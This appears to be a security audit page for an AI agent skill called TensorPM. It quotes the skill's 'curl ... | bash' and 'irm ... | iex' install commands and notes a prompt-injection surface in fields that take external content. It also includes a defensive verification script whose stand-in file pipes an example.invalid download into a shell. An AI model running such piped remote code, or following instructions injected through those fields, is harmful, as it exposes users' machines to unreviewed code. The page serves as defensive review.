tensorpm
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: CRITICAL
Categories: REMOTE_CODE_EXECUTION, EXTERNAL_DOWNLOADS, COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
- [Unverifiable Dependencies & Remote Code Execution] (CRITICAL): In SKILL.md, the skill instructs users to run 'curl -fsSL https://raw.githubusercontent.com/Neo552/TensorPM/main/scripts/install.sh | bash'. This pattern executes whatever the URL serves at the moment of the request, with no pinned version, checksum, or signature: the script is fetched from the mutable 'main' branch of an untrusted GitHub repository (Neo552 is not a trusted organization), so the code that runs can differ from anything the user reviewed beforehand.
- [Unverifiable Dependencies & Remote Code Execution] (CRITICAL): In SKILL.md, the skill also instructs Windows users to run 'irm https://raw.githubusercontent.com/Neo552/TensorPM/main/scripts/install.ps1 | iex', the PowerShell equivalent of the pattern above (Invoke-RestMethod piped into Invoke-Expression), which likewise executes unreviewed remote code from the same untrusted source.
- [Unverifiable Dependencies & Remote Code Execution] (HIGH): The skill promotes installing the TensorPM desktop application via 'brew', 'winget', and direct binary downloads from the 'Neo552/TensorPM-Releases' repository. Because the publisher is untrusted, these installers and binaries are unverified and potentially malicious; distribution through a package manager does not by itself establish trust in the upstream source.
- [Indirect Prompt Injection] (LOW): The skill has an indirect prompt injection surface through project-creation tools that ingest external data. Evidence:
  1. Ingestion: the 'documentPath' and 'prompt' fields in MCP-TOOLS.md and A2A-API.md accept external content.
  2. Boundary markers: absent; no delimiters or warnings mark embedded content as data rather than instructions.
  3. Capability inventory: localhost network operations (A2A API) and structured project state modification via MCP, so injected instructions could reach real actions.
  4. Sanitization: no sanitization or validation logic is documented.
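The safer alternative to the 'curl ... | bash' and 'irm ... | iex' patterns flagged above is fetch-to-file, verify, review, then execute. The script below is an added example written for this audit page, not TensorPM's own installer or any code from the Neo552 repositories. It assumes you downloaded the installer from a commit-pinned URL (the '<owner>/<repo>/<commit-sha>' placeholders are assumptions, not real paths) and recorded its SHA-256 after reading it; the two installer files it checks are constructed stand-ins created in a temporary directory, and the "tampered" one contains a chained 'curl ... | sh' to show the second refusal path.

```bash
#!/usr/bin/env bash
# Added example (not TensorPM code): replace `curl ... | bash` with
# fetch-to-file, digest check, static review, then execute.
set -eu

# Portable SHA-256 of a file (GNU sha256sum or BSD shasum).
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# verify_and_run FILE EXPECTED_SHA256
#   0 = digest matched, no chained download found, script executed
#   1 = digest mismatch, nothing executed
#   2 = script pipes another download into a shell, nothing executed
verify_and_run() {
  file="$1"
  expected="$2"
  actual="$(sha256_of "$file")"
  if [ "$actual" != "$expected" ]; then
    echo "digest mismatch for $file: got $actual, expected $expected" >&2
    return 1
  fi
  # Installers often re-fetch and pipe more remote code; refuse those so
  # the digest check cannot be bypassed by the script's own fetches.
  if grep -Eq '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh' "$file"; then
    echo "$file chains another remote download into a shell; review manually" >&2
    return 2
  fi
  bash "$file"
}

# --- Constructed stand-ins for a downloaded install.sh (not real files) ---
# Real use: curl -fsSL -o install.sh \
#   https://raw.githubusercontent.com/<owner>/<repo>/<commit-sha>/scripts/install.sh
# (pin a commit SHA, not 'main'), read the file, then record/compare its digest.
workdir="$(mktemp -d)"
trap 'rm -rf "$workdir"' EXIT

good="$workdir/install.sh"
printf '#!/bin/sh\necho "installer ran"\n' > "$good"
GOOD_SHA="$(sha256_of "$good")"   # the digest you recorded after review

tampered="$workdir/install-tampered.sh"
printf '#!/bin/sh\necho "installer ran"\ncurl -fsSL https://example.invalid/x.sh | sh\n' > "$tampered"

# Usage: verify_and_run "$good" "$GOOD_SHA"      -> runs the script (exit 0)
#        verify_and_run "$tampered" "$GOOD_SHA"  -> refuses, digest mismatch (exit 1)
```

If the project publishes no digest or signature, the check only guards against the file changing after you reviewed it (trust on first use); it does not establish that the publisher is trustworthy, which is the audit's core finding. The same approach applies on Windows: save the .ps1 with Invoke-WebRequest, compare Get-FileHash against a recorded value, read it, and only then run it, rather than piping it into Invoke-Expression.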
Recommendations
- HIGH: Downloads and executes remote code from: https://raw.githubusercontent.com/Neo552/TensorPM/main/scripts/install.sh - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata